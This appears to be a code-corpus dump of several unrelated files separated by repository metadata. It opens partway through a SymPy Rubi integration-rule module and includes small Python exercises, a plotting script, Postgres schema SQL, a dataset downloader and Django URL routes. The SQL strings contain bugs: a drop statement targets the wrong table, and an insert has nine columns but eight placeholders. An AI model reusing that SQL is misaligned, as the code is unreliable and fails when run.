pattern1975 = Pattern(Integral(G_**(u_*WC('h', S(1)))*(F_**(v_*WC('e', S(1)))*WC('b', S(1)) + a_)**n_, x_), cons1099, cons1137, cons2, cons3, cons48, cons209, cons4, cons810, cons811)
def replacement1975(v, u, b, G, a, n, x, h, F, e):
rubi.append(1975)
return Int(G**(h*ExpandToSum(u, x))*(F**(e*ExpandToSum(v, x))*b + a)**n, x)
rule1975 = ReplacementRule(pattern1975, replacement1975)
def With1976(t, f, b, g, r, G, d, c, n, a, H, x, h, s, e, F):
if isinstance(x, (int, Integer, float, Float)):
return False
m = FullSimplify((g*h*log(G) + s*t*log(H))/(d*e*log(F)))
if RationalQ(m):
return True
return False
pattern1976 = Pattern(Integral(G_**((x_*WC('g', S(1)) + WC('f', S(0)))*WC('h', S(1)))*H_**((x_*WC('s', S(1)) + WC('r', S(0)))*WC('t', S(1)))*(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*WC('b', S(1)) + a_)**WC('n', S(1)), x_), cons1099, cons1137, cons1140, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons52, cons800, cons1141, cons4, cons1139, CustomConstraint(With1976))
def replacement1976(t, f, b, g, r, G, d, c, n, a, H, x, h, s, e, F):
m = FullSimplify((g*h*log(G) + s*t*log(H))/(d*e*log(F)))
rubi.append(1976)
return Dist(G**(-c*g*h/d + f*h)*H**(-c*s*t/d + r*t)*Denominator(m)/(d*e*log(F)), Subst(Int(x**(Numerator(m) + S(-1))*(a + b*x**Denominator(m))**n, x), x, F**(e*(c + d*x)/Denominator(m))), x)
rule1976 = ReplacementRule(pattern1976, replacement1976)
pattern1977 = Pattern(Integral(G_**((x_*WC('g', S(1)) + WC('f', S(0)))*WC('h', S(1)))*H_**((x_*WC('s', S(1)) + WC('r', S(0)))*WC('t', S(1)))*(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*WC('b', S(1)) + a_)**WC('n', S(1)), x_), cons1099, cons1137, cons1140, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons52, cons800, cons1141, cons1142, cons85)
def replacement1977(t, f, b, g, r, G, d, c, n, a, H, x, h, s, e, F):
rubi.append(1977)
return Dist(G**(h*(-c*g/d + f)), Int(H**(t*(r + s*x))*(b + F**(-e*(c + d*x))*a)**n, x), x)
rule1977 = ReplacementRule(pattern1977, replacement1977)
pattern1978 = Pattern(Integral(G_**((x_*WC('g', S(1)) + WC('f', S(0)))*WC('h', S(1)))*H_**((x_*WC('s', S(1)) + WC('r', S(0)))*WC('t', S(1)))*(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*WC('b', S(1)) + a_)**WC('n', S(1)), x_), cons1099, cons1137, cons1140, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons52, cons800, cons1141, cons1143, cons148)
def replacement1978(t, f, b, g, r, G, d, c, n, a, H, x, h, s, e, F):
rubi.append(1978)
return Int(G**(f*h)*G**(g*h*x)*H**(r*t)*H**(s*t*x)*(F**(c*e)*F**(d*e*x)*b + a)**n, x)
rule1978 = ReplacementRule(pattern1978, replacement1978)
pattern1979 = Pattern(Integral(G_**((x_*WC('g', S(1)) + WC('f', S(0)))*WC('h', S(1)))*H_**((x_*WC('s', S(1)) + WC('r', S(0)))*WC('t', S(1)))*(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*WC('b', S(1)) + a_)**n_, x_), cons1099, cons1137, cons1140, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons52, cons800, cons1141, cons1143, cons196)
def replacement1979(t, f, b, g, r, G, d, c, a, n, H, x, h, s, e, F):
rubi.append(1979)
return Simp(G**(h*(f + g*x))*H**(t*(r + s*x))*a**n*Hypergeometric2F1(-n, (g*h*log(G) + s*t*log(H))/(d*e*log(F)), S(1) + (g*h*log(G) + s*t*log(H))/(d*e*log(F)), -F**(e*(c + d*x))*b/a)/(g*h*log(G) + s*t*log(H)), x)
rule1979 = ReplacementRule(pattern1979, replacement1979)
pattern1980 = Pattern(Integral(G_**((x_*WC('g', S(1)) + WC('f', S(0)))*WC('h', S(1)))*H_**((x_*WC('s', S(1)) + WC('r', S(0)))*WC('t', S(1)))*(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*WC('b', S(1)) + a_)**n_, x_), cons1099, cons1137, cons1140, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons52, cons800, cons1141, cons4, cons1143, cons23)
def replacement1980(t, f, b, g, r, G, d, c, a, n, H, x, h, s, e, F):
rubi.append(1980)
return Simp(G**(h*(f + g*x))*H**(t*(r + s*x))*((F**(e*(c + d*x))*b + a)/a)**(-n)*(F**(e*(c + d*x))*b + a)**n*Hypergeometric2F1(-n, (g*h*log(G) + s*t*log(H))/(d*e*log(F)), S(1) + (g*h*log(G) + s*t*log(H))/(d*e*log(F)), -F**(e*(c + d*x))*b/a)/(g*h*log(G) + s*t*log(H)), x)
rule1980 = ReplacementRule(pattern1980, replacement1980)
pattern1981 = Pattern(Integral(G_**(u_*WC('h', S(1)))*H_**(w_*WC('t', S(1)))*(F_**(v_*WC('e', S(1)))*WC('b', S(1)) + a_)**n_, x_), cons1099, cons1137, cons1140, cons2, cons3, cons48, cons209, cons1141, cons4, cons812, cons813)
def replacement1981(v, w, u, t, b, G, a, n, H, x, h, F, e):
rubi.append(1981)
return Int(G**(h*ExpandToSum(u, x))*H**(t*ExpandToSum(w, x))*(F**(e*ExpandToSum(v, x))*b + a)**n, x)
rule1981 = ReplacementRule(pattern1981, replacement1981)
pattern1982 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*WC('b', S(1)) + x_**WC('n', S(1))*WC('a', S(1)))**WC('p', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons4, cons5, cons54)
def replacement1982(p, b, d, c, a, n, x, F, e):
rubi.append(1982)
return -Dist(a*n/(b*d*e*log(F)), Int(x**(n + S(-1))*(F**(e*(c + d*x))*b + a*x**n)**p, x), x) + Simp((F**(e*(c + d*x))*b + a*x**n)**(p + S(1))/(b*d*e*(p + S(1))*log(F)), x)
rule1982 = ReplacementRule(pattern1982, replacement1982)
pattern1983 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*x_**WC('m', S(1))*(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*WC('b', S(1)) + x_**WC('n', S(1))*WC('a', S(1)))**WC('p', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons21, cons4, cons5, cons54)
def replacement1983(p, m, b, d, c, a, n, x, F, e):
rubi.append(1983)
return -Dist(a*n/(b*d*e*log(F)), Int(x**(m + n + S(-1))*(F**(e*(c + d*x))*b + a*x**n)**p, x), x) - Dist(m/(b*d*e*(p + S(1))*log(F)), Int(x**(m + S(-1))*(F**(e*(c + d*x))*b + a*x**n)**(p + S(1)), x), x) + Simp(x**m*(F**(e*(c + d*x))*b + a*x**n)**(p + S(1))/(b*d*e*(p + S(1))*log(F)), x)
rule1983 = ReplacementRule(pattern1983, replacement1983)
def With1984(v, u, m, f, b, g, c, a, x, F):
q = Rt(-S(4)*a*c + b**S(2), S(2))
rubi.append(1984)
return Dist(S(2)*c/q, Int((f + g*x)**m/(S(2)*F**u*c + b - q), x), x) - Dist(S(2)*c/q, Int((f + g*x)**m/(S(2)*F**u*c + b + q), x), x)
pattern1984 = Pattern(Integral((x_*WC('g', S(1)) + WC('f', S(0)))**WC('m', S(1))/(F_**u_*WC('b', S(1)) + F_**v_*WC('c', S(1)) + WC('a', S(0))), x_), cons1099, cons2, cons3, cons7, cons125, cons208, cons1144, cons68, cons226, cons62)
rule1984 = ReplacementRule(pattern1984, With1984)
def With1985(v, u, m, f, b, g, c, a, x, F):
q = Rt(-S(4)*a*c + b**S(2), S(2))
rubi.append(1985)
return Dist(S(2)*c/q, Int(F**u*(f + g*x)**m/(S(2)*F**u*c + b - q), x), x) - Dist(S(2)*c/q, Int(F**u*(f + g*x)**m/(S(2)*F**u*c + b + q), x), x)
pattern1985 = Pattern(Integral(F_**u_*(x_*WC('g', S(1)) + WC('f', S(0)))**WC('m', S(1))/(F_**u_*WC('b', S(1)) + F_**v_*WC('c', S(1)) + WC('a', S(0))), x_), cons1099, cons2, cons3, cons7, cons125, cons208, cons1144, cons68, cons226, cons62)
rule1985 = ReplacementRule(pattern1985, With1985)
def With1986(v, u, m, f, b, g, i, c, a, x, h, F):
q = Rt(-S(4)*a*c + b**S(2), S(2))
rubi.append(1986)
return -Dist(-i + (-b*i + S(2)*c*h)/q, Int((f + g*x)**m/(S(2)*F**u*c + b + q), x), x) + Dist(i + (-b*i + S(2)*c*h)/q, Int((f + g*x)**m/(S(2)*F**u*c + b - q), x), x)
pattern1986 = Pattern(Integral((F_**u_*WC('i', S(1)) + h_)*(x_*WC('g', S(1)) + WC('f', S(0)))**WC('m', S(1))/(F_**u_*WC('b', S(1)) + F_**v_*WC('c', S(1)) + WC('a', S(0))), x_), cons1099, cons2, cons3, cons7, cons125, cons208, cons209, cons224, cons1144, cons68, cons226, cons62)
rule1986 = ReplacementRule(pattern1986, With1986)
def With1987(v, m, b, d, c, a, x, F):
u = IntHide(S(1)/(F**v*b + F**(c + d*x)*a), x)
rubi.append(1987)
return -Dist(m, Int(u*x**(m + S(-1)), x), x) + Simp(u*x**m, x)
pattern1987 = Pattern(Integral(x_**WC('m', S(1))/(F_**v_*WC('b', S(1)) + F_**(x_*WC('d', S(1)) + WC('c', S(0)))*WC('a', S(1))), x_), cons1099, cons2, cons3, cons7, cons27, cons1145, cons31, cons168)
rule1987 = ReplacementRule(pattern1987, With1987)
pattern1988 = Pattern(Integral(u_/(F_**v_*WC('b', S(1)) + F_**w_*WC('c', S(1)) + a_), x_), cons1099, cons2, cons3, cons7, cons552, cons1146, cons1147, cons1148)
def replacement1988(v, w, u, b, c, a, x, F):
rubi.append(1988)
return Int(F**v*u/(F**(S(2)*v)*b + F**v*a + c), x)
rule1988 = ReplacementRule(pattern1988, replacement1988)
pattern1989 = Pattern(Integral(F_**((x_*WC('e', S(1)) + WC('d', S(0)))**WC('n', S(1))*WC('g', S(1)))/(x_**S(2)*WC('c', S(1)) + x_*WC('b', S(1)) + WC('a', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons208, cons4, cons1149)
def replacement1989(g, b, d, a, n, c, x, F, e):
rubi.append(1989)
return Int(ExpandIntegrand(F**(g*(d + e*x)**n), S(1)/(a + b*x + c*x**S(2)), x), x)
rule1989 = ReplacementRule(pattern1989, replacement1989)
pattern1990 = Pattern(Integral(F_**((x_*WC('e', S(1)) + WC('d', S(0)))**WC('n', S(1))*WC('g', S(1)))/(a_ + x_**S(2)*WC('c', S(1))), x_), cons1099, cons2, cons7, cons27, cons48, cons208, cons4, cons1150)
def replacement1990(g, d, c, n, a, x, F, e):
rubi.append(1990)
return Int(ExpandIntegrand(F**(g*(d + e*x)**n), S(1)/(a + c*x**S(2)), x), x)
rule1990 = ReplacementRule(pattern1990, replacement1990)
pattern1991 = Pattern(Integral(F_**((x_*WC('e', S(1)) + WC('d', S(0)))**WC('n', S(1))*WC('g', S(1)))*u_**WC('m', S(1))/(c_*x_**S(2) + x_*WC('b', S(1)) + WC('a', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons208, cons4, cons804, cons17)
def replacement1991(u, m, g, b, d, a, n, c, x, F, e):
rubi.append(1991)
return Int(ExpandIntegrand(F**(g*(d + e*x)**n), u**m/(a + b*x + c*x**S(2)), x), x)
rule1991 = ReplacementRule(pattern1991, replacement1991)
pattern1992 = Pattern(Integral(F_**((x_*WC('e', S(1)) + WC('d', S(0)))**WC('n', S(1))*WC('g', S(1)))*u_**WC('m', S(1))/(a_ + c_*x_**S(2)), x_), cons1099, cons2, cons7, cons27, cons48, cons208, cons4, cons804, cons17)
def replacement1992(u, m, g, d, a, n, c, x, F, e):
rubi.append(1992)
return Int(ExpandIntegrand(F**(g*(d + e*x)**n), u**m/(a + c*x**S(2)), x), x)
rule1992 = ReplacementRule(pattern1992, replacement1992)
pattern1993 = Pattern(Integral(F_**((x_**S(4)*WC('b', S(1)) + WC('a', S(0)))/x_**S(2)), x_), cons1099, cons2, cons3, cons1151)
def replacement1993(x, a, b, F):
rubi.append(1993)
return -Simp(sqrt(Pi)*Erf((-x**S(2)*sqrt(-b*log(F)) + sqrt(-a*log(F)))/x)*exp(-S(2)*sqrt(-a*log(F))*sqrt(-b*log(F)))/(S(4)*sqrt(-b*log(F))), x) + Simp(sqrt(Pi)*Erf((x**S(2)*sqrt(-b*log(F)) + sqrt(-a*log(F)))/x)*exp(S(2)*sqrt(-a*log(F))*sqrt(-b*log(F)))/(S(4)*sqrt(-b*log(F))), x)
rule1993 = ReplacementRule(pattern1993, replacement1993)
pattern1994 = Pattern(Integral(x_**WC('m', S(1))*(x_**WC('m', S(1)) + exp(x_))**n_, x_), cons93, cons168, cons463, cons1152)
def replacement1994(x, m, n):
rubi.append(1994)
return Dist(m, Int(x**(m + S(-1))*(x**m + exp(x))**n, x), x) + Int((x**m + exp(x))**(n + S(1)), x) - Simp((x**m + exp(x))**(n + S(1))/(n + S(1)), x)
rule1994 = ReplacementRule(pattern1994, replacement1994)
pattern1995 = Pattern(Integral(log(a_ + (F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1))))**WC('n', S(1))*WC('b', S(1))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons4, cons43)
def replacement1995(b, d, c, n, a, x, F, e):
rubi.append(1995)
return Dist(S(1)/(d*e*n*log(F)), Subst(Int(log(a + b*x)/x, x), x, (F**(e*(c + d*x)))**n), x)
rule1995 = ReplacementRule(pattern1995, replacement1995)
pattern1996 = Pattern(Integral(log(a_ + (F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1))))**WC('n', S(1))*WC('b', S(1))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons4, cons448)
def replacement1996(b, d, c, n, a, x, F, e):
rubi.append(1996)
return -Dist(b*d*e*n*log(F), Int(x*(F**(e*(c + d*x)))**n/(a + b*(F**(e*(c + d*x)))**n), x), x) + Simp(x*log(a + b*(F**(e*(c + d*x)))**n), x)
rule1996 = ReplacementRule(pattern1996, replacement1996)
pattern1997 = Pattern(Integral((F_**v_*WC('a', S(1)))**n_*WC('u', S(1)), x_), cons1099, cons2, cons4, cons23)
def replacement1997(v, u, a, n, x, F):
rubi.append(1997)
return Dist(F**(-n*v)*(F**v*a)**n, Int(F**(n*v)*u, x), x)
rule1997 = ReplacementRule(pattern1997, replacement1997)
def With1998(x, u):
v = FunctionOfExponential(u, x)
rubi.append(1998)
return Dist(v/D(v, x), Subst(Int(FunctionOfExponentialFunction(u, x)/x, x), x, v), x)
pattern1998 = Pattern(Integral(u_, x_), cons1153)
rule1998 = ReplacementRule(pattern1998, With1998)
pattern1999 = Pattern(Integral((F_**v_*WC('a', S(1)) + F_**w_*WC('b', S(1)))**n_*WC('u', S(1)), x_), cons1099, cons2, cons3, cons4, cons196, cons1154)
def replacement1999(v, w, u, b, a, n, x, F):
rubi.append(1999)
return Int(F**(n*v)*u*(F**ExpandToSum(-v + w, x)*b + a)**n, x)
rule1999 = ReplacementRule(pattern1999, replacement1999)
pattern2000 = Pattern(Integral((F_**v_*WC('a', S(1)) + G_**w_*WC('b', S(1)))**n_*WC('u', S(1)), x_), cons1099, cons1137, cons2, cons3, cons4, cons196, cons1154)
def replacement2000(v, w, u, b, G, a, n, x, F):
rubi.append(2000)
return Int(F**(n*v)*u*(a + b*exp(ExpandToSum(-v*log(F) + w*log(G), x)))**n, x)
rule2000 = ReplacementRule(pattern2000, replacement2000)
pattern2001 = Pattern(Integral((F_**v_*WC('a', S(1)) + F_**w_*WC('b', S(1)))**n_*WC('u', S(1)), x_), cons1099, cons2, cons3, cons4, cons23, cons1154)
def replacement2001(v, w, u, b, a, n, x, F):
rubi.append(2001)
return Dist(F**(-n*v)*(F**v*a + F**w*b)**n*(F**ExpandToSum(-v + w, x)*b + a)**(-n), Int(F**(n*v)*u*(F**ExpandToSum(-v + w, x)*b + a)**n, x), x)
rule2001 = ReplacementRule(pattern2001, replacement2001)
pattern2002 = Pattern(Integral((F_**v_*WC('a', S(1)) + G_**w_*WC('b', S(1)))**n_*WC('u', S(1)), x_), cons1099, cons1137, cons2, cons3, cons4, cons23, cons1154)
def replacement2002(v, w, u, b, G, a, n, x, F):
rubi.append(2002)
return Dist(F**(-n*v)*(a + b*exp(ExpandToSum(-v*log(F) + w*log(G), x)))**(-n)*(F**v*a + G**w*b)**n, Int(F**(n*v)*u*(a + b*exp(ExpandToSum(-v*log(F) + w*log(G), x)))**n, x), x)
rule2002 = ReplacementRule(pattern2002, replacement2002)
pattern2003 = Pattern(Integral(F_**v_*G_**w_*WC('u', S(1)), x_), cons1099, cons1137, cons1155)
def replacement2003(v, w, u, G, x, F):
rubi.append(2003)
return Int(u*NormalizeIntegrand(exp(v*log(F) + w*log(G)), x), x)
rule2003 = ReplacementRule(pattern2003, replacement2003)
def With2004(v, w, u, y, x, F):
if isinstance(x, (int, Integer, float, Float)):
return False
z = v*y/(D(u, x)*log(F))
if ZeroQ(-w*y + D(z, x)):
return True
return False
pattern2004 = Pattern(Integral(F_**u_*(v_ + w_)*WC('y', S(1)), x_), cons1099, cons1099, CustomConstraint(With2004))
def replacement2004(v, w, u, y, x, F):
z = v*y/(D(u, x)*log(F))
rubi.append(2004)
return Simp(F**u*z, x)
rule2004 = ReplacementRule(pattern2004, replacement2004)
def With2005(v, w, u, n, x, F):
if isinstance(x, (int, Integer, float, Float)):
return False
z = v*D(u, x)*log(F) + (n + S(1))*D(v, x)
if And(Equal(Exponent(w, x), Exponent(z, x)), ZeroQ(w*Coefficient(z, x, Exponent(z, x)) - z*Coefficient(w, x, Exponent(w, x)))):
return True
return False
pattern2005 = Pattern(Integral(F_**u_*v_**WC('n', S(1))*w_, x_), cons1099, cons4, cons804, cons1017, cons1109, CustomConstraint(With2005))
def replacement2005(v, w, u, n, x, F):
z = v*D(u, x)*log(F) + (n + S(1))*D(v, x)
rubi.append(2005)
return Simp(F**u*v**(n + S(1))*Coefficient(w, x, Exponent(w, x))/Coefficient(z, x, Exponent(z, x)), x)
rule2005 = ReplacementRule(pattern2005, replacement2005)
return [rule1901, rule1902, rule1903, rule1904, rule1905, rule1906, rule1907, rule1908, rule1909, rule1910, rule1911, rule1912, rule1913, rule1914, rule1915, rule1916, rule1917, rule1918, rule1919, rule1920, rule1921, rule1922, rule1923, rule1924, rule1925, rule1926, rule1927, rule1928, rule1929, rule1930, rule1931, rule1932, rule1933, rule1934, rule1935, rule1936, rule1937, rule1938, rule1939, rule1940, rule1941, rule1942, rule1943, rule1944, rule1945, rule1946, rule1947, rule1948, rule1949, rule1950, rule1951, rule1952, rule1953, rule1954, rule1955, rule1956, rule1957, rule1958, rule1959, rule1960, rule1961, rule1962, rule1963, rule1964, rule1965, rule1966, rule1967, rule1968, rule1969, rule1970, rule1971, rule1972, rule1973, rule1974, rule1975, rule1976, rule1977, rule1978, rule1979, rule1980, rule1981, rule1982, rule1983, rule1984, rule1985, rule1986, rule1987, rule1988, rule1989, rule1990, rule1991, rule1992, rule1993, rule1994, rule1995, rule1996, rule1997, rule1998, rule1999, rule2000, rule2001, rule2002, rule2003, rule2004, rule2005, ]
| [
"[email protected]"
]
| |
08abe221a6e2af6878de699a1d34b050881e8401 | 2b19f22b47dfd8c01ed2acf335a88ef3271de873 | /IOI/difference.py | 5b3c5f89ee7d33064fe73fa1fd734200918f80c5 | []
| no_license | Aminehassou/spaghetti-code | 0e319bd4712d57bbea8e3714fd64698aa70719fd | f63c0596d5691bf2b2b3d622e8271983e10c0cfe | refs/heads/master | 2023-01-04T11:59:43.668791 | 2019-12-17T22:28:04 | 2019-12-17T22:28:04 | 306,032,400 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 117 | py | try:
while True:
a, b = (map(int, input().split()))
print (abs(a - b))
except EOFError:
pass
| [
"[email protected]"
]
| |
5581f1877e0859073d8bad360dbf8d6e6b5ed449 | 43949d3f05bf1d1212cc25fd5766a47940723f7b | /generators/gen.py | 5202bb3d33b604cfc3856de4de253eacca2d802f | []
| no_license | asing177/python_programs | f6aa5b53b6f0b2d8c824c8b796ca77d8a1121110 | dfa18f7ec6bd0eb29311a393e011d89dac1a7e26 | refs/heads/master | 2020-12-21T14:39:27.761117 | 2020-02-06T08:12:32 | 2020-02-06T08:12:32 | 236,462,869 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 290 | py | def my_gen():
n = 1
print('This is printed first')
# Generator function contains yield statements
yield n
n += 1
print('This is printed second')
yield n
n += 1
print('This is printed at last')
yield n
a = my_gen()
next(a)
next(a)
next(a)
next(a) | [
"[email protected]"
]
| |
1b58373ac66d0ddb7dc9aeda27c62602f8569f74 | de707c94c91f554d549e604737b72e6c86eb0755 | /math/0x01-plotting/2-change_scale.py | 480bf1b1af07c3d6f3b678dbbd1083ba7969a535 | []
| no_license | ejonakodra/holbertonschool-machine_learning-1 | 885cf89c1737573228071e4dc8e26304f393bc30 | 8834b201ca84937365e4dcc0fac978656cdf5293 | refs/heads/main | 2023-07-10T09:11:01.298863 | 2021-08-11T03:43:59 | 2021-08-11T03:43:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | #!/usr/bin/env python3
""" plots x, y as a line graph where y-axis is scaled logarithmically """
import numpy as np
import matplotlib.pyplot as plt
x = np.arange(0, 28651, 5730)
r = np.log(0.5)
t = 5730
y = np.exp((r / t) * x)
plt.plot(x, y)
plt.xlabel('Time (years)')
plt.ylabel('Fraction Remaining')
plt.title("Exponential Decay of C-14")
plt.yscale("log")
plt.xlim((0, 28650))
plt.show()
| [
"[email protected]"
]
| |
1c3fe0cc2873b5858a438ae7dbeaf43f1ace5c25 | 8c6466e12bb3351031c25677127dc86d13bd9b19 | /Project data Modelling with Postgress/sql_queries.py | 09f272907dc0ece9579ce135decdb08810006f0f | []
| no_license | andreodendaal/udacity_data_engineering | ac8eb889db002014b3ccf1fe15b16f77361b8d55 | 03524ffbd1830d168761fcc996cab329dd064977 | refs/heads/master | 2020-05-05T09:24:02.921194 | 2020-01-15T20:22:14 | 2020-01-15T20:22:14 | 179,902,884 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,481 | py | # DROP TABLES
songplay_table_drop = "DROP TABLE IF EXISTS songplays;"
user_table_drop = "DROP TABLE IF EXISTS users;"
song_table_drop = "DROP TABLE IF EXISTS songs;"
artist_table_drop = "DROP TABLE IF EXISTS artists;"
time_table_drop = "DROP TABLE IF EXISTS songplays;"
# CREATE TABLES
songplay_table_create = ("""CREATE TABLE IF NOT EXISTS songplays (songplay_id varchar, start_time timestamp, user_id varchar, level varchar, song_id varchar, artist_id varchar, session_id varchar, location varchar, user_agent varchar, PRIMARY KEY (songplay_id));""")
user_table_create = ("""CREATE TABLE IF NOT EXISTS users (user_id varchar, first_name varchar, last_name varchar, gender varchar, level varchar, PRIMARY KEY (user_id));
""")
song_table_create = ("""CREATE TABLE IF NOT EXISTS songs (song_id varchar, title varchar, artist_id varchar, year int, duration int, PRIMARY KEY (song_id));
""")
#song_id title artist_id year duration
artist_table_create = ("""CREATE TABLE IF NOT EXISTS artists (artist_id varchar, name varchar, location varchar, lattitude float, longitude float, PRIMARY KEY (artist_id));
""")
# https://www.postgresql.org/docs/9.1/functions-datetime.html
time_table_create = ("""CREATE TABLE IF NOT EXISTS time (start_time timestamp, hour int, day int, week int, month int, year int, weekday int, PRIMARY KEY (start_time));
""")
# INSERT RECORDS
songplay_table_insert = ("""INSERT INTO songplays (songplay_id, start_time, user_id, level, song_id, artist_id, session_id, location, user_agen) VALUES(%s, %s, %s, %s, %s, %s, %s, %s);""")
user_table_insert = ("""INSERT INTO users (user_id, first_name, last_name, gender, level) VALUES(%s, %s, %s, %s, %s ) ON CONFLICT (user_id) DO NOTHING;""")
song_table_insert = ("""INSERT INTO songs (song_id, title, artist_id, year, duration) VALUES(%s, %s, %s, %s, %s);""")
artist_table_insert = ("""INSERT INTO artists (artist_id, name, location, lattitude, longitude) VALUES(%s, %s, %s, %s, %s);""")
time_table_insert = ("""INSERT INTO time (start_time, hour, day, week, month, year, weekday) VALUES(%s, %s, %s, %s, %s, %s, %s);""")
# FIND SONGS
song_select = ("""
""")
# QUERY LISTS
#create_table_queries = [songplay_table_create]
create_table_queries = [songplay_table_create, user_table_create, song_table_create, artist_table_create, time_table_create]
#drop_table_queries = [songplay_table_drop]
drop_table_queries = [songplay_table_drop, user_table_drop, song_table_drop, artist_table_drop, time_table_drop] | [
"[email protected]"
]
| |
d485cc88de5469d66c7dbc503dbb0e3206144138 | b1ffcbd977595bccf15dd56e965bda62867d1e10 | /omrdatasettools/downloaders/PrintedMusicSymbolsDatasetDownloader.py | 818cb93eca0478aa48e520f084374eba04cbd048 | [
"CC-BY-NC-SA-4.0",
"GPL-2.0-only",
"CC-BY-SA-3.0",
"MIT",
"GPL-1.0-or-later",
"CC-BY-SA-4.0",
"LicenseRef-scancode-public-domain",
"AGPL-3.0-only"
]
| permissive | fzalkow/OMR-Datasets | 7ded5bb9278e47c84a16de01081876d6bb2e6dbe | c9e7a986199998d6a735875503e6dcce5fdf1193 | refs/heads/master | 2020-09-14T15:30:45.824800 | 2020-01-06T12:07:52 | 2020-01-06T12:07:52 | 223,169,792 | 0 | 0 | MIT | 2019-11-21T12:32:31 | 2019-11-21T12:32:30 | null | UTF-8 | Python | false | false | 1,896 | py | import argparse
import os
from omrdatasettools.downloaders.DatasetDownloader import DatasetDownloader
class PrintedMusicSymbolsDatasetDownloader(DatasetDownloader):
""" Loads the Printed Music Symbols dataset
https://github.com/apacha/PrintedMusicSymbolsDataset
Copyright 2017 by Alexander Pacha under MIT license
"""
def get_dataset_download_url(self) -> str:
# If this link does not work anymore, find the images at https://github.com/apacha/PrintedMusicSymbolsDataset
return "https://github.com/apacha/OMR-Datasets/releases/download/datasets/PrintedMusicSymbolsDataset.zip"
def get_dataset_filename(self) -> str:
return "PrintedMusicSymbolsDataset.zip"
def download_and_extract_dataset(self, destination_directory: str):
if not os.path.exists(self.get_dataset_filename()):
print("Downloading Printed Music Symbol dataset...")
self.download_file(self.get_dataset_download_url(), self.get_dataset_filename())
print("Extracting Printed Music Symbol dataset...")
absolute_path_to_temp_folder = os.path.abspath('PrintedMusicSymbolsDataset')
self.extract_dataset(absolute_path_to_temp_folder)
DatasetDownloader.copytree(os.path.join(absolute_path_to_temp_folder, "PrintedMusicSymbolsDataset"),
os.path.abspath(destination_directory))
self.clean_up_temp_directory(absolute_path_to_temp_folder)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--dataset_directory",
type=str,
default="../data/printed_images",
help="The directory, where the extracted dataset will be copied to")
flags, unparsed = parser.parse_known_args()
dataset = PrintedMusicSymbolsDatasetDownloader()
dataset.download_and_extract_dataset(flags.dataset_directory)
| [
"[email protected]"
]
| |
333c48d27ec8d5b0ea5633bffadd6e27638c0522 | 315450354c6ddeda9269ffa4c96750783963d629 | /CMSSW_7_0_4/src/Configuration/TotemCommon/python/__init__.py | 6cf341a440a2c973942ba5aad7ebac154203e274 | []
| no_license | elizamelo/CMSTOTEMSim | e5928d49edb32cbfeae0aedfcf7bd3131211627e | b415e0ff0dad101be5e5de1def59c5894d7ca3e8 | refs/heads/master | 2021-05-01T01:31:38.139992 | 2017-09-12T17:07:12 | 2017-09-12T17:07:12 | 76,041,270 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 202 | py | #Automatically created by SCRAM
import os
__path__.append(os.path.dirname(os.path.abspath(__file__).rsplit('/Configuration/TotemCommon/',1)[0])+'/cfipython/slc6_amd64_gcc481/Configuration/TotemCommon')
| [
"[email protected]"
]
| |
5ddfb724efcc821a79c4e342fe9315c9e87c4d99 | 038e6e41d117431869edad4952a5b1463d5131bc | /donations/urls.py | f1cd42016e4516213c853992d4476f9cab832f42 | [
"MIT"
]
| permissive | MikaelSantilio/aprepi-django | c49290855b7c83ecaf08de82ee9eedf8e8baa15a | 5e2b5ecffb287eab929c0759ea35ab073cc19d96 | refs/heads/master | 2023-06-19T00:18:15.986920 | 2021-06-15T20:15:59 | 2021-06-15T20:15:59 | 329,428,268 | 0 | 1 | MIT | 2021-02-05T16:21:45 | 2021-01-13T20:50:18 | Python | UTF-8 | Python | false | false | 1,043 | py | from django.urls import path
from donations import views
app_name = "donations"
urlpatterns = [
path('', views.MakeDonation.as_view(), name='unique-donation'),
path('historico/', views.DonationListView.as_view(), name='list'),
# path('checkout/<str:value>', views.MPCheckout.as_view(), name='mp-checkout'),
# path('anonima/', views.MakeAnonymousDonation.as_view(), name='anonymous-donation'),
# path('recorrente/', views.MakeRecurringDonation.as_view(), name='recurring-donation'),
path('obrigado/', views.ThankYouView.as_view(), name='thankyou'),
# path('cartoes/', views.CreditCardListView.as_view(), name='list-cc'),
# path('cartoes/cadastrar', views.CreditCardCreateView.as_view(), name='create-cc'),
# path('cartoes/<int:pk>', views.CreditCardDetailView.as_view(), name='detail-cc'),
# path('cartoes/atualizar/<int:pk>',
# views.CreditCardUpdateView.as_view(), name='update-cc'),
# path('cartoes/apagar/<int:pk>',
# views.CreditCardDeleteView.as_view(), name='delete-cc')
]
| [
"[email protected]"
]
| |
